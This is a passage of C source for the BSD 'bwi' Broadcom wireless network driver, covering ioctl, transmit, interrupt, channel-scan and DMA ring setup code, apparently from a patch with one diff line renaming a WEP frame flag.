*)sc->sc_cur_regwin; if ((ifp->if_flags & IFF_PROMISC) && (sc->sc_flags & BWI_F_PROMISC) == 0) { promisc = 1; sc->sc_flags |= BWI_F_PROMISC; } else if ((ifp->if_flags & IFF_PROMISC) == 0 && (sc->sc_flags & BWI_F_PROMISC)) { promisc = 0; sc->sc_flags &= ~BWI_F_PROMISC; } if (promisc >= 0) bwi_mac_set_promisc(mac, promisc); } if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { bwi_init_statechg(sc, 1); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) bwi_stop_locked(sc, 1); } BWI_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; #undef IS_RUNNING } static void bwi_start(struct ifnet *ifp) { struct bwi_softc *sc = ifp->if_softc; BWI_LOCK(sc); bwi_start_locked(ifp); BWI_UNLOCK(sc); } static void bwi_start_locked(struct ifnet *ifp) { struct bwi_softc *sc = ifp->if_softc; struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[BWI_TX_DATA_RING]; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct ieee80211_key *k; struct mbuf *m; int trans, idx; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; trans = 0; idx = tbd->tbd_idx; while (tbd->tbd_buf[idx].tb_mbuf == NULL) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); /* XXX: LOCK */ if (m == NULL) break; ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m); if (k == NULL) { ieee80211_free_node(ni); m_freem(m); ifp->if_oerrors++; continue; } } wh = NULL; /* Catch any invalid use */ if (bwi_encap(sc, idx, m, ni) != 0) { /* 'm' is freed in bwi_encap() if we reach here */ if (ni != NULL) ieee80211_free_node(ni); ifp->if_oerrors++; continue; } trans = 1; tbd->tbd_used++; idx = (idx + 1) % BWI_TX_NDESC; ifp->if_opackets++; if (tbd->tbd_used + BWI_TX_NSPRDESC >= BWI_TX_NDESC) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } } tbd->tbd_idx = idx; if (trans) sc->sc_tx_timer = 5; } static int bwi_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct bwi_softc *sc = ifp->if_softc; /* XXX wme? */ struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[BWI_TX_DATA_RING]; int idx, error; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { ieee80211_free_node(ni); m_freem(m); return ENETDOWN; } BWI_LOCK(sc); idx = tbd->tbd_idx; KASSERT(tbd->tbd_buf[idx].tb_mbuf == NULL, ("slot %d not empty", idx)); if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ error = bwi_encap(sc, idx, m, ni); } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ error = bwi_encap_raw(sc, idx, m, ni, params); } if (error == 0) { ifp->if_opackets++; if (++tbd->tbd_used + BWI_TX_NSPRDESC >= BWI_TX_NDESC) ifp->if_drv_flags |= IFF_DRV_OACTIVE; tbd->tbd_idx = (idx + 1) % BWI_TX_NDESC; sc->sc_tx_timer = 5; } else { /* NB: m is reclaimed on encap failure */ ieee80211_free_node(ni); ifp->if_oerrors++; } BWI_UNLOCK(sc); return error; } static void bwi_watchdog(void *arg) { struct bwi_softc *sc; struct ifnet *ifp; sc = arg; ifp = sc->sc_ifp; BWI_ASSERT_LOCKED(sc); if (sc->sc_tx_timer != 0 && --sc->sc_tx_timer == 0) { if_printf(ifp, "watchdog timeout\n"); ifp->if_oerrors++; taskqueue_enqueue(sc->sc_tq, &sc->sc_restart_task); } callout_reset(&sc->sc_watchdog_timer, hz, bwi_watchdog, sc); } static void bwi_stop(struct bwi_softc *sc, int statechg) { BWI_LOCK(sc); bwi_stop_locked(sc, statechg); BWI_UNLOCK(sc); } static void bwi_stop_locked(struct bwi_softc *sc, int statechg) { struct ifnet *ifp = sc->sc_ifp; struct bwi_mac *mac; int i, error, pwr_off = 0; BWI_ASSERT_LOCKED(sc); callout_stop(&sc->sc_calib_ch); callout_stop(&sc->sc_led_blink_ch); sc->sc_led_blinking = 0; sc->sc_flags |= BWI_F_STOP; if (ifp->if_drv_flags & IFF_DRV_RUNNING) { KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_disable_intrs(sc, BWI_ALL_INTRS); CSR_READ_4(sc, BWI_MAC_INTR_MASK); bwi_mac_stop(mac); } for (i = 0; i < sc->sc_nmac; ++i) { struct bwi_regwin *old_rw; mac = &sc->sc_mac[i]; if ((mac->mac_flags & BWI_MAC_F_INITED) == 0) continue; error = bwi_regwin_switch(sc, &mac->mac_regwin, &old_rw); if (error) continue; bwi_mac_shutdown(mac); pwr_off = 1; bwi_regwin_switch(sc, old_rw, NULL); } if (pwr_off) bwi_bbp_power_off(sc); sc->sc_tx_timer = 0; callout_stop(&sc->sc_watchdog_timer); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); } void bwi_intr(void *xsc) { struct bwi_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct bwi_mac *mac; uint32_t intr_status; uint32_t txrx_intr_status[BWI_TXRX_NRING]; int i, txrx_error, tx = 0, rx_data = -1; BWI_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || (sc->sc_flags & BWI_F_STOP)) { BWI_UNLOCK(sc); return; } /* * Get interrupt status */ intr_status = CSR_READ_4(sc, BWI_MAC_INTR_STATUS); if (intr_status == 0xffffffff) { /* Not for us */ BWI_UNLOCK(sc); return; } DPRINTF(sc, BWI_DBG_INTR, "intr status 0x%08x\n", intr_status); intr_status &= CSR_READ_4(sc, BWI_MAC_INTR_MASK); if (intr_status == 0) { /* Nothing is interesting */ BWI_UNLOCK(sc); return; } KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; txrx_error = 0; DPRINTF(sc, BWI_DBG_INTR, "%s\n", "TX/RX intr"); for (i = 0; i < BWI_TXRX_NRING; ++i) { uint32_t mask; if (BWI_TXRX_IS_RX(i)) mask = BWI_TXRX_RX_INTRS; else mask = BWI_TXRX_TX_INTRS; txrx_intr_status[i] = CSR_READ_4(sc, BWI_TXRX_INTR_STATUS(i)) & mask; _DPRINTF(sc, BWI_DBG_INTR, ", %d 0x%08x", i, txrx_intr_status[i]); if (txrx_intr_status[i] & BWI_TXRX_INTR_ERROR) { if_printf(ifp, "%s: intr fatal TX/RX (%d) error 0x%08x\n", __func__, i, txrx_intr_status[i]); txrx_error = 1; } } _DPRINTF(sc, BWI_DBG_INTR, "%s\n", ""); /* * Acknowledge interrupt */ CSR_WRITE_4(sc, BWI_MAC_INTR_STATUS, intr_status); for (i = 0; i < BWI_TXRX_NRING; ++i) CSR_WRITE_4(sc, BWI_TXRX_INTR_STATUS(i), txrx_intr_status[i]); /* Disable all interrupts */ bwi_disable_intrs(sc, BWI_ALL_INTRS); /* * http://bcm-specs.sipsolutions.net/Interrupts * Says for this bit (0x800): * "Fatal Error * * We got this one while testing things when by accident the * template ram wasn't set to big endian when it should have * been after writing the initial values. It keeps on being * triggered, the only way to stop it seems to shut down the * chip." * * Suggesting that we should never get it and if we do we're not * feeding TX packets into the MAC correctly if we do... Apparently, * it is valid only on mac version 5 and higher, but I couldn't * find a reference for that... Since I see them from time to time * on my card, this suggests an error in the tx path still... */ if (intr_status & BWI_INTR_PHY_TXERR) { if (mac->mac_flags & BWI_MAC_F_PHYE_RESET) { if_printf(ifp, "%s: intr PHY TX error\n", __func__); taskqueue_enqueue(sc->sc_tq, &sc->sc_restart_task); BWI_UNLOCK(sc); return; } } if (txrx_error) { /* TODO: reset device */ } if (intr_status & BWI_INTR_TBTT) bwi_mac_config_ps(mac); if (intr_status & BWI_INTR_EO_ATIM) if_printf(ifp, "EO_ATIM\n"); if (intr_status & BWI_INTR_PMQ) { for (;;) { if ((CSR_READ_4(sc, BWI_MAC_PS_STATUS) & 0x8) == 0) break; } CSR_WRITE_2(sc, BWI_MAC_PS_STATUS, 0x2); } if (intr_status & BWI_INTR_NOISE) if_printf(ifp, "intr noise\n"); if (txrx_intr_status[0] & BWI_TXRX_INTR_RX) { rx_data = sc->sc_rxeof(sc); if (sc->sc_flags & BWI_F_STOP) { BWI_UNLOCK(sc); return; } } if (txrx_intr_status[3] & BWI_TXRX_INTR_RX) { sc->sc_txeof_status(sc); tx = 1; } if (intr_status & BWI_INTR_TX_DONE) { bwi_txeof(sc); tx = 1; } /* Re-enable interrupts */ bwi_enable_intrs(sc, BWI_INIT_INTRS); if (sc->sc_blink_led != NULL && sc->sc_led_blink) { int evt = BWI_LED_EVENT_NONE; if (tx && rx_data > 0) { if (sc->sc_rx_rate > sc->sc_tx_rate) evt = BWI_LED_EVENT_RX; else evt = BWI_LED_EVENT_TX; } else if (tx) { evt = BWI_LED_EVENT_TX; } else if (rx_data > 0) { evt = BWI_LED_EVENT_RX; } else if (rx_data == 0) { evt = BWI_LED_EVENT_POLL; } if (evt != BWI_LED_EVENT_NONE) bwi_led_event(sc, evt); } BWI_UNLOCK(sc); } static void bwi_scan_start(struct ieee80211com *ic) { struct bwi_softc *sc = ic->ic_ifp->if_softc; BWI_LOCK(sc); /* Enable MAC beacon promiscuity */ CSR_SETBITS_4(sc, BWI_MAC_STATUS, BWI_MAC_STATUS_PASS_BCN); BWI_UNLOCK(sc); } static void bwi_set_channel(struct ieee80211com *ic) { struct bwi_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_channel *c = ic->ic_curchan; struct bwi_mac *mac; BWI_LOCK(sc); KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_rf_set_chan(mac, ieee80211_chan2ieee(ic, c), 0); sc->sc_rates = ieee80211_get_ratetable(c); /* * Setup radio tap channel freq and flags */ sc->sc_tx_th.wt_chan_freq = sc->sc_rx_th.wr_chan_freq = htole16(c->ic_freq); sc->sc_tx_th.wt_chan_flags = sc->sc_rx_th.wr_chan_flags = htole16(c->ic_flags & 0xffff); BWI_UNLOCK(sc); } static void bwi_scan_end(struct ieee80211com *ic) { struct bwi_softc *sc = ic->ic_ifp->if_softc; BWI_LOCK(sc); CSR_CLRBITS_4(sc, BWI_MAC_STATUS, BWI_MAC_STATUS_PASS_BCN); BWI_UNLOCK(sc); } static int bwi_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct bwi_vap *bvp = BWI_VAP(vap); struct ieee80211com *ic= vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; enum ieee80211_state ostate = vap->iv_state; struct bwi_softc *sc = ifp->if_softc; struct bwi_mac *mac; int error; BWI_LOCK(sc); callout_stop(&sc->sc_calib_ch); if (nstate == IEEE80211_S_INIT) sc->sc_txpwrcb_type = BWI_TXPWR_INIT; bwi_led_newstate(sc, nstate); error = bvp->bv_newstate(vap, nstate, arg); if (error != 0) goto back; /* * Clear the BSSID when we stop a STA */ if (vap->iv_opmode == IEEE80211_M_STA) { if (ostate == IEEE80211_S_RUN && nstate != IEEE80211_S_RUN) { /* * Clear out the BSSID. If we reassociate to * the same AP, this will reinialize things * correctly... */ if (ic->ic_opmode == IEEE80211_M_STA && !(sc->sc_flags & BWI_F_STOP)) bwi_set_bssid(sc, bwi_zero_addr); } } if (vap->iv_opmode == IEEE80211_M_MONITOR) { /* Nothing to do */ } else if (nstate == IEEE80211_S_RUN) { bwi_set_bssid(sc, vap->iv_bss->ni_bssid); KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; /* Initial TX power calibration */ bwi_mac_calibrate_txpower(mac, BWI_TXPWR_INIT); #ifdef notyet sc->sc_txpwrcb_type = BWI_TXPWR_FORCE; #else sc->sc_txpwrcb_type = BWI_TXPWR_CALIB; #endif callout_reset(&sc->sc_calib_ch, hz, bwi_calibrate, sc); } back: BWI_UNLOCK(sc); return error; } static int bwi_media_change(struct ifnet *ifp) { int error = ieee80211_media_change(ifp); /* NB: only the fixed rate can change and that doesn't need a reset */ return (error == ENETRESET ? 0 : error); } static int bwi_dma_alloc(struct bwi_softc *sc) { int error, i, has_txstats; bus_addr_t lowaddr = 0; bus_size_t tx_ring_sz, rx_ring_sz, desc_sz = 0; uint32_t txrx_ctrl_step = 0; has_txstats = 0; for (i = 0; i < sc->sc_nmac; ++i) { if (sc->sc_mac[i].mac_flags & BWI_MAC_F_HAS_TXSTATS) { has_txstats = 1; break; } } switch (sc->sc_bus_space) { case BWI_BUS_SPACE_30BIT: case BWI_BUS_SPACE_32BIT: if (sc->sc_bus_space == BWI_BUS_SPACE_30BIT) lowaddr = BWI_BUS_SPACE_MAXADDR; else lowaddr = BUS_SPACE_MAXADDR_32BIT; desc_sz = sizeof(struct bwi_desc32); txrx_ctrl_step = 0x20; sc->sc_init_tx_ring = bwi_init_tx_ring32; sc->sc_free_tx_ring = bwi_free_tx_ring32; sc->sc_init_rx_ring = bwi_init_rx_ring32; sc->sc_free_rx_ring = bwi_free_rx_ring32; sc->sc_setup_rxdesc = bwi_setup_rx_desc32; sc->sc_setup_txdesc = bwi_setup_tx_desc32; sc->sc_rxeof = bwi_rxeof32; sc->sc_start_tx = bwi_start_tx32; if (has_txstats) { sc->sc_init_txstats = bwi_init_txstats32; sc->sc_free_txstats = bwi_free_txstats32; sc->sc_txeof_status = bwi_txeof_status32; } break; case BWI_BUS_SPACE_64BIT: lowaddr = BUS_SPACE_MAXADDR; /* XXX */ desc_sz = sizeof(struct bwi_desc64); txrx_ctrl_step = 0x40; sc->sc_init_tx_ring = bwi_init_tx_ring64; sc->sc_free_tx_ring = bwi_free_tx_ring64; sc->sc_init_rx_ring = bwi_init_rx_ring64; sc->sc_free_rx_ring = bwi_free_rx_ring64; sc->sc_setup_rxdesc = bwi_setup_rx_desc64; sc->sc_setup_txdesc = bwi_setup_tx_desc64; sc->sc_rxeof = bwi_rxeof64; sc->sc_start_tx = bwi_start_tx64; if (has_txstats) { sc->sc_init_txstats = bwi_init_txstats64; sc->sc_free_txstats = bwi_free_txstats64; sc->sc_txeof_status = bwi_txeof_status64; } break; } KASSERT(lowaddr != 0, ("lowaddr zero")); KASSERT(desc_sz != 0, ("desc_sz zero")); KASSERT(txrx_ctrl_step != 0, ("txrx_ctrl_step zero")); tx_ring_sz = roundup(desc_sz * BWI_TX_NDESC, BWI_RING_ALIGN); rx_ring_sz = roundup(desc_sz * BWI_RX_NDESC, BWI_RING_ALIGN); /* * Create top level DMA tag */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), /* parent */ BWI_ALIGN, 0, /* alignment, bounds */ lowaddr, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ MAXBSIZE, /* maxsize */ BUS_SPACE_UNRESTRICTED, /* nsegments */ BUS_SPACE_MAXSIZE_32BIT, /* maxsegsize */ BUS_DMA_ALLOCNOW, /* flags */ NULL, NULL, /* lockfunc, lockarg */ &sc->sc_parent_dtag); if (error) { device_printf(sc->sc_dev, "can't create parent DMA tag\n"); return error; } #define TXRX_CTRL(idx) (BWI_TXRX_CTRL_BASE + (idx) * txrx_ctrl_step) /* * Create TX ring DMA stuffs */ error = bus_dma_tag_create(sc->sc_parent_dtag, BWI_RING_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, tx_ring_sz, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &sc->sc_txring_dtag); if (error) { device_printf(sc->sc_dev, "can't create TX ring DMA tag\n"); return error; } for (i = 0; i < BWI_TX_NRING; ++i) { error = bwi_dma_ring_alloc(sc, sc->sc_txring_dtag, &sc->sc_tx_rdata[i], tx_ring_sz, TXRX_CTRL(i)); if (error) { device_printf(sc->sc_dev, "%dth TX ring " "DMA alloc failed\n", i); return error; } } /* * Create RX ring DMA stuffs */ error = bus_dma_tag_create(sc->sc_parent_dtag, BWI_RING_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, rx_ring_sz, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &sc->sc_rxring_dtag); if (error) { device_printf(sc->sc_dev, "can't create RX ring DMA tag\n"); return error; } error = bwi_dma_ring_alloc(sc, sc->sc_rxring_dtag, &sc->sc_rx_rdata, rx_ring_sz, TXRX_CTRL(0)); if (error) { device_printf(sc->sc_dev, "RX ring DMA alloc failed\n"); return error; } if (has_txstats) { error = bwi_dma_txstats_alloc(sc, TXRX_CTRL(3), desc_sz); if (error) { device_printf(sc->sc_dev, "TX stats DMA alloc failed\n"); return error; } } #undef TXRX_CTRL return bwi_dma_mbuf_create(sc); } static void bwi_dma_free(struct bwi_softc *sc) { if (sc->sc_txring_dtag != NULL) { int i; for (i = 0; i < BWI_TX_NRING; ++i) { struct bwi_ring_data *rd = &sc->sc_tx_rdata[i]; if (rd->rdata_desc != NULL) { bus_dmamap_unload(sc->sc_txring_dtag, rd->rdata_dmap); bus_dmamem_free(sc->sc_txring_dtag, rd->rdata_desc, rd->rdata_dmap); } } bus_dma_tag_destroy(sc->sc_txring_dtag); } if (sc->sc_rxring_dtag != NULL) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; if (rd->rdata_desc != NULL) { bus_dmamap_unload(sc->sc_rxring_dtag, rd->rdata_dmap); bus_dmamem_free(sc->sc_rxring_dtag, rd->rdata_desc, rd->rdata_dmap); } bus_dma_tag_destroy(sc->sc_rxring_dtag); } bwi_dma_txstats_free(sc); bwi_dma_mbuf_destroy(sc, BWI_TX_NRING, 1); if (sc->sc_parent_dtag != NULL) bus_dma_tag_destroy(sc->sc_parent_dtag); } static int bwi_dma_ring_alloc(struct bwi_softc *sc, bus_dma_tag_t dtag, struct bwi_ring_data *rd, bus_size_t size, uint32_t txrx_ctrl) { int error; error = bus_dmamem_alloc(dtag, &rd->rdata_desc, BUS_DMA_WAITOK | BUS_DMA_ZERO, &rd->rdata_dmap); if (error) { device_printf(sc->sc_dev, "can't allocate DMA mem\n"); return error; } error = bus_dmamap_load(dtag, rd->rdata_dmap, rd->rdata_desc, size, bwi_dma_ring_addr, &rd->rdata_paddr, BUS_DMA_NOWAIT); if (error) { device_printf(sc->sc_dev, "can't load DMA mem\n"); bus_dmamem_free(dtag, rd->rdata_desc, rd->rdata_dmap); rd->rdata_desc = NULL; return error; } rd->rdata_txrx_ctrl = txrx_ctrl; return 0; } static int bwi_dma_txstats_alloc(struct bwi_softc *sc, uint32_t ctrl_base, bus_size_t desc_sz) { struct bwi_txstats_data *st; bus_size_t dma_size; int error; st = malloc(sizeof(*st), M_DEVBUF, M_NOWAIT | M_ZERO); if (st == NULL) { device_printf(sc->sc_dev, "can't allocate txstats data\n"); return ENOMEM; } sc->sc_txstats = st; /* * Create TX stats descriptor DMA stuffs */ dma_size = roundup(desc_sz * BWI_TXSTATS_NDESC, BWI_RING_ALIGN); error = bus_dma_tag_create(sc->sc_parent_dtag, BWI_RING_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, dma_size, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &st->stats_ring_dtag); if (error) { device_printf(sc->sc_dev, "can't create txstats ring " "DMA tag\n"); return error; } error = bus_dmamem_alloc(st->stats_ring_dtag, &st->stats_ring, BUS_DMA_WAITOK | BUS_DMA_ZERO, &st->stats_ring_dmap); if (error) { device_printf(sc->sc_dev, "can't allocate txstats ring " "DMA mem\n"); bus_dma_tag_destroy(st->stats_ring_dtag); st->stats_ring_dtag = NULL; return error; } error = bus_dmamap_load(st->stats_ring_dtag, st->stats_ring_dmap, st->stats_ring, dma_size, bwi_dma_ring_addr, &st->stats_ring_paddr, BUS_DMA_NOWAIT); if (error) { device_printf(sc->sc_dev, "can't load txstats ring DMA mem\n"); bus_dmamem_free(st->stats_ring_dtag, st->stats_ring, st->stats_ring_dmap); bus_dma_tag_destroy(st->stats_ring_dtag); st->stats_ring_dtag = NULL; return error; } /* * Create TX stats DMA stuffs */ dma_size = roundup(sizeof(struct bwi_txstats) * BWI_TXSTATS_NDESC, BWI_ALIGN); error = bus_dma_tag_create(sc->sc_parent_dtag, BWI_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, dma_size, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &st->stats_dtag); if (error) { device_printf(sc->sc_dev, "can't create txstats DMA tag\n"); return error; } error = bus_dmamem_alloc(st->stats_dtag, (void **)&st->stats, BUS_DMA_WAITOK | BUS_DMA_ZERO, &st->stats_dmap); if (error) { device_printf(sc->sc_dev, "can't allocate txstats DMA mem\n"); bus_dma_tag_destroy(st->stats_dtag); st->stats_dtag = NULL; return error; } error = bus_dmamap_load(st->stats_dtag, st->stats_dmap, st->stats, dma_size, bwi_dma_ring_addr, &st->stats_paddr, BUS_DMA_NOWAIT); if (error) { device_printf(sc->sc_dev, "can't load txstats DMA mem\n"); bus_dmamem_free(st->stats_dtag, st->stats, st->stats_dmap); bus_dma_tag_destroy(st->stats_dtag); st->stats_dtag = NULL; return error; } st->stats_ctrl_base = ctrl_base; return 0; } static void bwi_dma_txstats_free(struct bwi_softc *sc) { struct bwi_txstats_data *st; if (sc->sc_txstats == NULL) return; st = sc->sc_txstats; if (st->stats_ring_dtag != NULL) { bus_dmamap_unload(st->stats_ring_dtag, st->stats_ring_dmap); bus_dmamem_free(st->stats_ring_dtag, st->stats_ring, st->stats_ring_dmap); bus_dma_tag_destroy(st->stats_ring_dtag); } if (st->stats_dtag != NULL) { bus_dmamap_unload(st->stats_dtag, st->stats_dmap); bus_dmamem_free(st->stats_dtag, st->stats, st->stats_dmap); bus_dma_tag_destroy(st->stats_dtag); } free(st, M_DEVBUF); } static void bwi_dma_ring_addr(void *arg, bus_dma_segment_t *seg, int nseg, int error) { KASSERT(nseg == 1, ("too many segments\n")); *((bus_addr_t *)arg) = seg->ds_addr; } static int bwi_dma_mbuf_create(struct bwi_softc *sc) { struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; int i, j, k, ntx, error; /* * Create TX/RX mbuf DMA tag */ error = bus_dma_tag_create(sc->sc_parent_dtag, 1, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &sc->sc_buf_dtag); if (error) { device_printf(sc->sc_dev, "can't create mbuf DMA tag\n"); return error; } ntx = 0; /* * Create TX mbuf DMA map */ for (i = 0; i < BWI_TX_NRING; ++i) { struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[i]; for (j = 0; j < BWI_TX_NDESC; ++j) { error = bus_dmamap_create(sc->sc_buf_dtag, 0, &tbd->tbd_buf[j].tb_dmap); if (error) { device_printf(sc->sc_dev, "can't create " "%dth tbd, %dth DMA map\n", i, j); ntx = i; for (k = 0; k < j; ++k) { bus_dmamap_destroy(sc->sc_buf_dtag, tbd->tbd_buf[k].tb_dmap); } goto fail; } } } ntx = BWI_TX_NRING; /* * Create RX mbuf DMA map and a spare DMA map */ error = bus_dmamap_create(sc->sc_buf_dtag, 0, &rbd->rbd_tmp_dmap); if (error) { device_printf(sc->sc_dev, "can't create spare RX buf DMA map\n"); goto fail; } for (j = 0; j < BWI_RX_NDESC; ++j) { error = bus_dmamap_create(sc->sc_buf_dtag, 0, &rbd->rbd_buf[j].rb_dmap); if (error) { device_printf(sc->sc_dev, "can't create %dth " "RX buf DMA map\n", j); for (k = 0; k < j; ++k) { bus_dmamap_destroy(sc->sc_buf_dtag, rbd->rbd_buf[j].rb_dmap); } bus_dmamap_destroy(sc->sc_buf_dtag, rbd->rbd_tmp_dmap); goto fail; } } return 0; fail: bwi_dma_mbuf_destroy(sc, ntx, 0); return error; } static void bwi_dma_mbuf_destroy(struct bwi_softc *sc, int ntx, int nrx) { int i, j; if (sc->sc_buf_dtag == NULL) return; for (i = 0; i < ntx; ++i) { struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[i]; for (j = 0; j < BWI_TX_NDESC; ++j) { struct bwi_txbuf *tb = &tbd->tbd_buf[j]; if (tb->tb_mbuf != NULL) { bus_dmamap_unload(sc->sc_buf_dtag, tb->tb_dmap); m_freem(tb->tb_mbuf); } if (tb->tb_ni != NULL) ieee80211_free_node(tb->tb_ni); bus_dmamap_destroy(sc->sc_buf_dtag, tb->tb_dmap); } } if (nrx) { struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; bus_dmamap_destroy(sc->sc_buf_dtag, rbd->rbd_tmp_dmap); for (j = 0; j < BWI_RX_NDESC; ++j) { struct bwi_rxbuf *rb = &rbd->rbd_buf[j]; if (rb->rb_mbuf != NULL) { bus_dmamap_unload(sc->sc_buf_dtag, rb->rb_dmap); m_freem(rb->rb_mbuf); } bus_dmamap_destroy(sc->sc_buf_dtag, rb->rb_dmap); } } bus_dma_tag_destroy(sc->sc_buf_dtag); sc->sc_buf_dtag = NULL; } static void bwi_enable_intrs(struct bwi_softc *sc, uint32_t enable_intrs) { CSR_SETBITS_4(sc, BWI_MAC_INTR_MASK, enable_intrs); } static void bwi_disable_intrs(struct bwi_softc *sc, uint32_t disable_intrs) { CSR_CLRBITS_4(sc, BWI_MAC_INTR_MASK, disable_intrs); } static int bwi_init_tx_ring32(struct bwi_softc *sc, int ring_idx) { struct bwi_ring_data *rd; struct bwi_txbuf_data *tbd; uint32_t val, addr_hi, addr_lo; KASSERT(ring_idx < BWI_TX_NRING, ("ring_idx %d", ring_idx)); rd = &sc->sc_tx_rdata[ring_idx]; tbd = &sc->sc_tx_bdata[ring_idx]; tbd->tbd_idx = 0; tbd->tbd_used = 0; bzero(rd->rdata_desc, sizeof(struct bwi_desc32) * BWI_TX_NDESC); bus_dmamap_sync(sc->sc_txring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); addr_lo = __SHIFTOUT(rd->rdata_paddr, BWI_TXRX32_RINGINFO_ADDR_MASK); addr_hi = __SHIFTOUT(rd->rdata_paddr, BWI_TXRX32_RINGINFO_FUNC_MASK); val = __SHIFTIN(addr_lo, BWI_TXRX32_RINGINFO_ADDR_MASK) | __SHIFTIN(BWI_TXRX32_RINGINFO_FUNC_TXRX, BWI_TXRX32_RINGINFO_FUNC_MASK); CSR_WRITE_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_RINGINFO, val); val = __SHIFTIN(addr_hi, BWI_TXRX32_CTRL_ADDRHI_MASK) | BWI_TXRX32_CTRL_ENABLE; CSR_WRITE_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_CTRL, val); return 0; } static void bwi_init_rxdesc_ring32(struct bwi_softc *sc, uint32_t ctrl_base, bus_addr_t paddr, int hdr_size, int ndesc) { uint32_t val, addr_hi, addr_lo; addr_lo = __SHIFTOUT(paddr, BWI_TXRX32_RINGINFO_ADDR_MASK); addr_hi = __SHIFTOUT(paddr, BWI_TXRX32_RINGINFO_FUNC_MASK); val = __SHIFTIN(addr_lo, BWI_TXRX32_RINGINFO_ADDR_MASK) | __SHIFTIN(BWI_TXRX32_RINGINFO_FUNC_TXRX, BWI_TXRX32_RINGINFO_FUNC_MASK); CSR_WRITE_4(sc, ctrl_base + BWI_RX32_RINGINFO, val); val = __SHIFTIN(hdr_size, BWI_RX32_CTRL_HDRSZ_MASK) | __SHIFTIN(addr_hi, BWI_TXRX32_CTRL_ADDRHI_MASK) | BWI_TXRX32_CTRL_ENABLE; CSR_WRITE_4(sc, ctrl_base + BWI_RX32_CTRL, val); CSR_WRITE_4(sc, ctrl_base + BWI_RX32_INDEX, (ndesc - 1) * sizeof(struct bwi_desc32)); } static int bwi_init_rx_ring32(struct bwi_softc *sc) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; int i, error; sc->sc_rx_bdata.rbd_idx = 0; for (i = 0; i < BWI_RX_NDESC; ++i) { error = bwi_newbuf(sc, i, 1); if (error) { device_printf(sc->sc_dev, "can't allocate %dth RX buffer\n", i); return error; } } bus_dmamap_sync(sc->sc_rxring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); bwi_init_rxdesc_ring32(sc, rd->rdata_txrx_ctrl, rd->rdata_paddr, sizeof(struct bwi_rxbuf_hdr), BWI_RX_NDESC); return 0; } static int bwi_init_txstats32(struct bwi_softc *sc) { struct bwi_txstats_data *st = sc->sc_txstats; bus_addr_t stats_paddr; int i; bzero(st->stats, BWI_TXSTATS_NDESC * sizeof(struct bwi_txstats)); bus_dmamap_sync(st->stats_dtag, st->stats_dmap, 